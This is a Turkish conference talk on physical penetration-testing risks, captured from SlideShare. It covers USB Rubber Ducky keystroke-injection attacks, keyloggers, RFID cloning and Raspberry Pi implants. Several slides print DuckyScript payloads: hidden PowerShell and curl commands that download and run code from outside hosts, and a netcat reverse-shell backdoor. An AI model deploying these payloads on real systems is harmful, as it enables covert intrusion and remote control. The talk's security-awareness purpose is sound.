SlideShare a Scribd company logo
1 of 29
Download to read offline
Sızma Testlerinde
Fiziksel Güvenlik Riskleri
Siber Güvenlik Konferansı’14
Harbiye / İstanbul
Konuşmacı Hakkında
Ozan UÇAR
●  Kıdemli Bilgi Güvenliği Danışmanı
●  Eğitmen
BGA Bilgi Güvenliği AKADEMİSİ
ozan.ucar@bga.com.tr
http://twitter.com/ucarozan
www.cehturkiye.com & blog.bga.com.tr
Sunumun Amacı Nedir / Ne Değildir.
●  Yazılımsal risklerin yanı sıra fiziksel güvenlik
zafiyetlerinin bizlere (ve sizlere) etkisini
tartışmak.
●  Paranoyaklık yaratmak değildir.
●  Yeni şeyler öğrenmek, fikir üretmek.
●  Ve biraz eğlenmek :)
Fiziksel Etkileşimler
●  USB aygıtlar ile bilgi alış verişi
●  Klavye/Mouse kullanımları
●  Kablosuz ağ kullanımları
●  CD/DVD okuyuculara erişim
●  Datacenter’lardaki kabinler,raflar
●  Fiziksel erişime açık, aktif ağ cihazları
(router,switch,access point vb.)
Pratik Hayattan Fiziksel Riskler
Gerçek hayatta pratik olarak
karşılaşabileceğimiz fiziksel riskler;
➢ Programlanabilir USB Aygıtlar
➢ Sahte Kablosuz Ağlar
➢ RFC/NFC Yan Atak Saldırıları
➢ RFID Kopyalayıcılar
➢ Donanımsal Keyloggerlar
➢ Mini Donanımlar (Raspberry pi)
USB HID
USB HID
USB HID
●  USB Rubber Ducky klavye chipsetine sahip
programlanabilir konsept bir donanımdır.
●  Kolaylıkla programlanabilir USB Rubber Ducky aynı
zamanda içinde bulunan micro sd kart ile sisteme veri
aktarabilme özelliğine de sahiptir.
USB HID / Hangi Sistemleri Etkiler ?
USB portundan erişim kurduğunuz tüm sistemlerde,
- Linux / Windows / Mac OS X işletimi sistemine sahip
tüm bilgisayarlarda.
- Micro Usb Girişe Sahip Mobile Cihazlar (Android vb.)
- Switch/Router gibi aktif ağ cihazları
- Endüstriyel Sistemler
Neden İhtiyaç Duyarız ?
●  Komutarları sizden daha hızlı ve hatasız gönderir
●  Siz kurbanı oyalarken, o saldırı gerçekleştirir.
●  Çalışması zamanlanabilir (taktıkdan şu kadar süre
sonra, kurban sisteme giriş yaptığında çalış gibi gibi)
●  1 dakikadan az sürede hedefe ulaşabilirsiniz (sadece
hayal edip, uygulayın)
●  Autorun özelliğine ihtiyaç yok!
●  Antivirus, Sezgisel Antiloggerlar ve Firewall’lar ile hiç
sorunu yok.
USB HID / OS Attack Payloads
●  Program indirip kurma,çalıştırma.
●  Kullanıcı Oluşturma
●  Dosya yükleme, arama, indirme
●  Proxy in the Middle
●  DNS ayarlarını değiştirme
USB HID / OS Attack Payloads
●  Parola denemeleri
●  Yerel parola özetlerini elde etmek (LM/NTLM
Hash)
●  Aktif kullanıcı parolalarını almak (mimikatz)
●  Klavye kısa yolları ile hayal ettiğiniz herşey
Söz sizde ...
USB HID / Wifi Attack Payloads
●  Bilgisayarı kablosuz ağ üzerinen erişime
açma
●  Sahte bir kablosuz ağa bağlantı
USB HID / Wifi Attack Payloads
●  Proxy in the Middle
Uygulamalar / Android
Cep telefonlarının casus yazılımlar ile
uzaktan kontrolü
Demo:
https://www.youtube.com/watch?
v=lO6ddGSv_U0
Uygulamalar / Windows
Windows Sistemlere Casus yazılım bulaştırma
(Powershell aracılığı ile)
USB HID / Programlama (DucyScript)
●  USB Rubber Ducky nin programlanması için
kullanılan dile verilen isim DuckyScript’dir.
●  Herhangi bir text editörü ile yazılabilir.(nano, VI, gedit,
notepad vb.)
●  Basit bir sözdizimine sahiptir, tüm komutlar bir satırda
ve büyük harfler kullanılarak yazılmalıdır.
USB HID / Programlama (DucyScript)
Windows Download & Execute
DELAY 3000
GUI r
DELAY 100
STRING powershell (new-object
System.Net.WebClient).DownloadF
ile('http://site.com/aa.exe','%TEMP
%bb.exe');
DELAY 100
STRING Start-Process "%TEMP%
bb.exe"
ENTER
Windows Test
DELAY 3000
GUI R
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 750
STRING Merhaba
Dunya!!!
ENTER
Mac OS X Download & Execute
DELAY 1000
COMMAND SPACE
DELAY 800
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING curl http://www.site.com/
script.py > file.py
ENTER
DELAY 1000
STRING python file.py
ENTER
USB HID / Programlama (DucyScript)
●  Simple Duck Payload Generator
https://code.google.com/p/simple-ducky-payload-generator/
USB HID / Programlama (DucyScript)
●  Online Ducky Toolkit
http://www.ducktoolkit.com
Uygulamalar / Windows
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-
object
System.Net.WebClient).DownloadFile('
http://89.95.238.x/b.txt','%TEMP%ajan007.exe');
Start-Process "%TEMP%winmgmt.exe"
ENTER
Uygulamalar / Windows
Uygulamalar / Mac OS X & Linux
Mac OS X / Linux sistemlere kalıcı arka kapı
bulaştırma.
Uygulamalar / Mac OS X & Linux
CTRL-ALT T
DELAY 400
ENTER
DELAY 300
STRING touch .script.sh
ENTER
STRING echo nc -nv ipport -e /bin/bash > .script.sh
ENTER
STRING chmod +x .script.sh
ENTER
STRING ./.script.sh ; bg
ENTER
DELAY 200
CTRL z
DELAY 400
STRING exit
ENTER
Hardware Keylogger
●  Klavye girişlerini hafızasına kaydeder.
●  Kablosuz ağ üzerinden veri aktarma
özelliğine sahip modelleri vardır.
RFID Kart Çoğaltıcılar
Kullanım alanları;
●  Kapı vb. kimlik doğrulama durumlarında
●  Casino’lar
●  Bizim spor salonunun giriş turnikeleri :P
●  http://www.ebay.com/bhp/rfid-copier
Raspberry pi
Mini bilgisayar
●  Yerel ağlara fiziksel
erişimlerde kullanılır.
●  Wifi/3G destekler
http://en.wikipedia.org/wiki/Raspberry_Pi
Raspberry pi Kullanım Alanları
Fiziksel erişim kurulduğu durumlarda;
Hedef olacak noktalar;
●  Yazılıcılar
●  Projeksiyon Cihazları
●  Switch
Raspberry pi Kullanım Alanları
Fiziksel erişim kurulduğu durumlarda;
Amaçlar;
●  802.1x kontrolleri vb. kontroller dummy
cihazlar için -genellikle- kapatılır, yerel ağa
uzaktan tam erişim sağlamak için ideal
yöntem.

More Related Content

Similar to Sızma Testlerinde Fiziksel Güvenlik - Ozan Uçar #SiberGuvenlikKonferansi 14.05.14

ISO 27001 Bilgi Güvenliği Yönetim Sistemi
ISO 27001 Bilgi Güvenliği Yönetim SistemiISO 27001 Bilgi Güvenliği Yönetim Sistemi
ISO 27001 Bilgi Güvenliği Yönetim SistemiEmre ERKIRAN
 
Bilgi güvenlik uygulamaları
Bilgi güvenlik uygulamalarıBilgi güvenlik uygulamaları
Bilgi güvenlik uygulamalarıMusa BEKTAŞ
 
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımı
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımıSüleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımı
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımıKasım Erkan
 
Lecture 1 Siber Güvenlik Temel Kavramlar
Lecture 1 Siber Güvenlik Temel KavramlarLecture 1 Siber Güvenlik Temel Kavramlar
Lecture 1 Siber Güvenlik Temel KavramlarTurkIOT
 
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Securitymtimur
 
Smmm ler siber güvenlik
Smmm ler siber güvenlikSmmm ler siber güvenlik
Smmm ler siber güvenlikSelçuk Gülten
 
Server acim 19_mayis_2010_sunum
Server acim 19_mayis_2010_sunumServer acim 19_mayis_2010_sunum
Server acim 19_mayis_2010_sunumInonu University
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıBGA Cyber Security
 
Açık Kaynak Kodu ve Güvenlik
Açık Kaynak Kodu ve GüvenlikAçık Kaynak Kodu ve Güvenlik
Açık Kaynak Kodu ve GüvenlikBurak DAYIOGLU
 
Bi̇li̇şi̇m Teknolojileri ve Yazılım
Bi̇li̇şi̇m Teknolojileri ve YazılımBi̇li̇şi̇m Teknolojileri ve Yazılım
Bi̇li̇şi̇m Teknolojileri ve YazılımBiliimyazlm
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat UlugayFuat Ulugay, CISSP
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugayFuat Ulugay, CISSP
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıBGA Cyber Security
 
1 pardus işletim_sistemi
1 pardus işletim_sistemi1 pardus işletim_sistemi
1 pardus işletim_sistemiBirtan Yıldız
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...OWASP Turkiye
 

Similar to Sızma Testlerinde Fiziksel Güvenlik - Ozan Uçar #SiberGuvenlikKonferansi 14.05.14 (20)

ISO 27001 Bilgi Güvenliği Yönetim Sistemi
ISO 27001 Bilgi Güvenliği Yönetim SistemiISO 27001 Bilgi Güvenliği Yönetim Sistemi
ISO 27001 Bilgi Güvenliği Yönetim Sistemi
 
Bilgi güvenlik uygulamaları
Bilgi güvenlik uygulamalarıBilgi güvenlik uygulamaları
Bilgi güvenlik uygulamaları
 
Cyber Kill Chain
Cyber Kill ChainCyber Kill Chain
Cyber Kill Chain
 
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımı
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımıSüleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımı
Süleyman Özarslan - Cyber kill chain modeli güvenlik denetim yaklaşımı
 
Lecture 1 Siber Güvenlik Temel Kavramlar
Lecture 1 Siber Güvenlik Temel KavramlarLecture 1 Siber Güvenlik Temel Kavramlar
Lecture 1 Siber Güvenlik Temel Kavramlar
 
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
 
Smmm ler siber güvenlik
Smmm ler siber güvenlikSmmm ler siber güvenlik
Smmm ler siber güvenlik
 
Server acim 19_mayis_2010_sunum
Server acim 19_mayis_2010_sunumServer acim 19_mayis_2010_sunum
Server acim 19_mayis_2010_sunum
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
 
Modül 5: GÜVENLİK
Modül 5: GÜVENLİKModül 5: GÜVENLİK
Modül 5: GÜVENLİK
 
SİBER GÜVENLİK
SİBER GÜVENLİKSİBER GÜVENLİK
SİBER GÜVENLİK
 
Açık Kaynak Kodu ve Güvenlik
Açık Kaynak Kodu ve GüvenlikAçık Kaynak Kodu ve Güvenlik
Açık Kaynak Kodu ve Güvenlik
 
Bi̇li̇şi̇m Teknolojileri ve Yazılım
Bi̇li̇şi̇m Teknolojileri ve YazılımBi̇li̇şi̇m Teknolojileri ve Yazılım
Bi̇li̇şi̇m Teknolojileri ve Yazılım
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat Ulugay
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
 
Hamza durak
Hamza durakHamza durak
Hamza durak
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
 
1 pardus işletim_sistemi
1 pardus işletim_sistemi1 pardus işletim_sistemi
1 pardus işletim_sistemi
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Ahmet Can Kan - Attacking Mobile App...
 

More from Siber Güvenlik Derneği

Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...
Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...
Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...Siber Güvenlik Derneği
 
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14Siber Güvenlik Derneği
 
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14Siber Güvenlik Derneği
 
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...Siber Güvenlik Derneği
 
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...Siber Güvenlik Derneği
 
Uygulama guvenligi gunu - malicious web sites
Uygulama guvenligi gunu - malicious web sitesUygulama guvenligi gunu - malicious web sites
Uygulama guvenligi gunu - malicious web sitesSiber Güvenlik Derneği
 
Uygulama Güvenliği Günü 2012 - Siber Güvenlik Derneği
Uygulama Güvenliği Günü 2012 - Siber Güvenlik DerneğiUygulama Güvenliği Günü 2012 - Siber Güvenlik Derneği
Uygulama Güvenliği Günü 2012 - Siber Güvenlik DerneğiSiber Güvenlik Derneği
 
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Derneği
 
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Derneği
 
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013Siber Güvenlik Derneği
 
Siber Güvenlik Konferansı'14 Tanıtım Sunumu
Siber Güvenlik Konferansı'14 Tanıtım SunumuSiber Güvenlik Konferansı'14 Tanıtım Sunumu
Siber Güvenlik Konferansı'14 Tanıtım SunumuSiber Güvenlik Derneği
 
Siber Güvenlik Konferansı'14 Sponsorluk Sunumu
Siber Güvenlik Konferansı'14 Sponsorluk SunumuSiber Güvenlik Konferansı'14 Sponsorluk Sunumu
Siber Güvenlik Konferansı'14 Sponsorluk SunumuSiber Güvenlik Derneği
 

More from Siber Güvenlik Derneği (16)

Siber Güvenlik Raporu-SGD
Siber Güvenlik Raporu-SGDSiber Güvenlik Raporu-SGD
Siber Güvenlik Raporu-SGD
 
Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...
Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...
Bulut Teknolojileri ile Siber Güvenliği Sağlamak - Oğuz Pastırmacı #SiberGuve...
 
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14
Bir Atağın Anatomisi - Abdurrahman Beyazarslan #SiberGuvenlikKonferansi 14.05.14
 
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14
Android ve Zararlı Uygulamalar - İbrahim Baliç #SiberGuvenlikKonferansi 14.05.14
 
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...
Android'de Parmak Kaldırmadan Konuşmak - Oğuzhan Topgül #SiberGuvenlikKonfera...
 
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...
Yönetilmeyen Hiçbir Sistem Güvende Değildir! - Osman Demircan #SiberGuvenlikK...
 
Uygulama guvenligi gunu - malicious web sites
Uygulama guvenligi gunu - malicious web sitesUygulama guvenligi gunu - malicious web sites
Uygulama guvenligi gunu - malicious web sites
 
Uygulama Güvenliği Günü 2012 - Siber Güvenlik Derneği
Uygulama Güvenliği Günü 2012 - Siber Güvenlik DerneğiUygulama Güvenliği Günü 2012 - Siber Güvenlik Derneği
Uygulama Güvenliği Günü 2012 - Siber Güvenlik Derneği
 
Siber Güvenlikte Ofansif Yaklaşımlar
Siber Güvenlikte Ofansif YaklaşımlarSiber Güvenlikte Ofansif Yaklaşımlar
Siber Güvenlikte Ofansif Yaklaşımlar
 
SGD Internet Bağımlılığı Raporu
SGD Internet Bağımlılığı RaporuSGD Internet Bağımlılığı Raporu
SGD Internet Bağımlılığı Raporu
 
Siber Güvenlik Bülteni-2013
Siber Güvenlik Bülteni-2013Siber Güvenlik Bülteni-2013
Siber Güvenlik Bülteni-2013
 
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
 
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
Siber Güvenlik Çalıştayı Sponsorluk Sunumu - 2014
 
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013
Siber Güvenlik Buluşmaları 7. oturum, 1. kısım-07.12.2013
 
Siber Güvenlik Konferansı'14 Tanıtım Sunumu
Siber Güvenlik Konferansı'14 Tanıtım SunumuSiber Güvenlik Konferansı'14 Tanıtım Sunumu
Siber Güvenlik Konferansı'14 Tanıtım Sunumu
 
Siber Güvenlik Konferansı'14 Sponsorluk Sunumu
Siber Güvenlik Konferansı'14 Sponsorluk SunumuSiber Güvenlik Konferansı'14 Sponsorluk Sunumu
Siber Güvenlik Konferansı'14 Sponsorluk Sunumu
 

Sızma Testlerinde Fiziksel Güvenlik - Ozan Uçar #SiberGuvenlikKonferansi 14.05.14

  • 1. Sızma Testlerinde Fiziksel Güvenlik Riskleri Siber Güvenlik Konferansı’14 Harbiye / İstanbul
  • 2. Konuşmacı Hakkında Ozan UÇAR ●  Kıdemli Bilgi Güvenliği Danışmanı ●  Eğitmen BGA Bilgi Güvenliği AKADEMİSİ ozan.ucar@bga.com.tr http://twitter.com/ucarozan www.cehturkiye.com & blog.bga.com.tr
  • 3. Sunumun Amacı Nedir / Ne Değildir. ●  Yazılımsal risklerin yanı sıra fiziksel güvenlik zafiyetlerinin bizlere (ve sizlere) etkisini tartışmak. ●  Paranoyaklık yaratmak değildir. ●  Yeni şeyler öğrenmek, fikir üretmek. ●  Ve biraz eğlenmek :)
  • 4. Fiziksel Etkileşimler ●  USB aygıtlar ile bilgi alış verişi ●  Klavye/Mouse kullanımları ●  Kablosuz ağ kullanımları ●  CD/DVD okuyuculara erişim ●  Datacenter’lardaki kabinler,raflar ●  Fiziksel erişime açık, aktif ağ cihazları (router,switch,access point vb.)
  • 5. Pratik Hayattan Fiziksel Riskler Gerçek hayatta pratik olarak karşılaşabileceğimiz fiziksel riskler; ➢ Programlanabilir USB Aygıtlar ➢ Sahte Kablosuz Ağlar ➢ RFC/NFC Yan Atak Saldırıları ➢ RFID Kopyalayıcılar ➢ Donanımsal Keyloggerlar ➢ Mini Donanımlar (Raspberry pi)
  • 8. USB HID ●  USB Rubber Ducky klavye chipsetine sahip programlanabilir konsept bir donanımdır. ●  Kolaylıkla programlanabilir USB Rubber Ducky aynı zamanda içinde bulunan micro sd kart ile sisteme veri aktarabilme özelliğine de sahiptir.
  • 9. USB HID / Hangi Sistemleri Etkiler ? USB portundan erişim kurduğunuz tüm sistemlerde, - Linux / Windows / Mac OS X işletimi sistemine sahip tüm bilgisayarlarda. - Micro Usb Girişe Sahip Mobile Cihazlar (Android vb.) - Switch/Router gibi aktif ağ cihazları - Endüstriyel Sistemler
  • 10. Neden İhtiyaç Duyarız ? ●  Komutarları sizden daha hızlı ve hatasız gönderir ●  Siz kurbanı oyalarken, o saldırı gerçekleştirir. ●  Çalışması zamanlanabilir (taktıkdan şu kadar süre sonra, kurban sisteme giriş yaptığında çalış gibi gibi) ●  1 dakikadan az sürede hedefe ulaşabilirsiniz (sadece hayal edip, uygulayın) ●  Autorun özelliğine ihtiyaç yok! ●  Antivirus, Sezgisel Antiloggerlar ve Firewall’lar ile hiç sorunu yok.
  • 11. USB HID / OS Attack Payloads ●  Program indirip kurma,çalıştırma. ●  Kullanıcı Oluşturma ●  Dosya yükleme, arama, indirme ●  Proxy in the Middle ●  DNS ayarlarını değiştirme
  • 12. USB HID / OS Attack Payloads ●  Parola denemeleri ●  Yerel parola özetlerini elde etmek (LM/NTLM Hash) ●  Aktif kullanıcı parolalarını almak (mimikatz) ●  Klavye kısa yolları ile hayal ettiğiniz herşey Söz sizde ...
  • 13. USB HID / Wifi Attack Payloads ●  Bilgisayarı kablosuz ağ üzerinen erişime açma ●  Sahte bir kablosuz ağa bağlantı
  • 14. USB HID / Wifi Attack Payloads ●  Proxy in the Middle
  • 15. Uygulamalar / Android Cep telefonlarının casus yazılımlar ile uzaktan kontrolü Demo: https://www.youtube.com/watch? v=lO6ddGSv_U0
  • 16. Uygulamalar / Windows Windows Sistemlere Casus yazılım bulaştırma (Powershell aracılığı ile)
  • 17. USB HID / Programlama (DucyScript) ●  USB Rubber Ducky nin programlanması için kullanılan dile verilen isim DuckyScript’dir. ●  Herhangi bir text editörü ile yazılabilir.(nano, VI, gedit, notepad vb.) ●  Basit bir sözdizimine sahiptir, tüm komutlar bir satırda ve büyük harfler kullanılarak yazılmalıdır.
  • 18. USB HID / Programlama (DucyScript) Windows Download & Execute DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadF ile('http://site.com/aa.exe','%TEMP %bb.exe'); DELAY 100 STRING Start-Process "%TEMP% bb.exe" ENTER Windows Test DELAY 3000 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 750 STRING Merhaba Dunya!!! ENTER Mac OS X Download & Execute DELAY 1000 COMMAND SPACE DELAY 800 STRING Terminal DELAY 500 ENTER DELAY 500 STRING curl http://www.site.com/ script.py > file.py ENTER DELAY 1000 STRING python file.py ENTER
  • 19. USB HID / Programlama (DucyScript) ●  Simple Duck Payload Generator https://code.google.com/p/simple-ducky-payload-generator/
  • 20. USB HID / Programlama (DucyScript) ●  Online Ducky Toolkit http://www.ducktoolkit.com
  • 21. Uygulamalar / Windows GUI r DELAY 100 STRING powershell -windowstyle hidden (new- object System.Net.WebClient).DownloadFile(' http://89.95.238.x/b.txt','%TEMP%ajan007.exe'); Start-Process "%TEMP%winmgmt.exe" ENTER
  • 23. Uygulamalar / Mac OS X & Linux Mac OS X / Linux sistemlere kalıcı arka kapı bulaştırma.
  • 24. Uygulamalar / Mac OS X & Linux CTRL-ALT T DELAY 400 ENTER DELAY 300 STRING touch .script.sh ENTER STRING echo nc -nv ipport -e /bin/bash > .script.sh ENTER STRING chmod +x .script.sh ENTER STRING ./.script.sh ; bg ENTER DELAY 200 CTRL z DELAY 400 STRING exit ENTER
  • 25. Hardware Keylogger ●  Klavye girişlerini hafızasına kaydeder. ●  Kablosuz ağ üzerinden veri aktarma özelliğine sahip modelleri vardır.
  • 26. RFID Kart Çoğaltıcılar Kullanım alanları; ●  Kapı vb. kimlik doğrulama durumlarında ●  Casino’lar ●  Bizim spor salonunun giriş turnikeleri :P ●  http://www.ebay.com/bhp/rfid-copier
  • 27. Raspberry pi Mini bilgisayar ●  Yerel ağlara fiziksel erişimlerde kullanılır. ●  Wifi/3G destekler http://en.wikipedia.org/wiki/Raspberry_Pi
  • 28. Raspberry pi Kullanım Alanları Fiziksel erişim kurulduğu durumlarda; Hedef olacak noktalar; ●  Yazılıcılar ●  Projeksiyon Cihazları ●  Switch
  • 29. Raspberry pi Kullanım Alanları Fiziksel erişim kurulduğu durumlarda; Amaçlar; ●  802.1x kontrolleri vb. kontroller dummy cihazlar için -genellikle- kapatılır, yerel ağa uzaktan tam erişim sağlamak için ideal yöntem.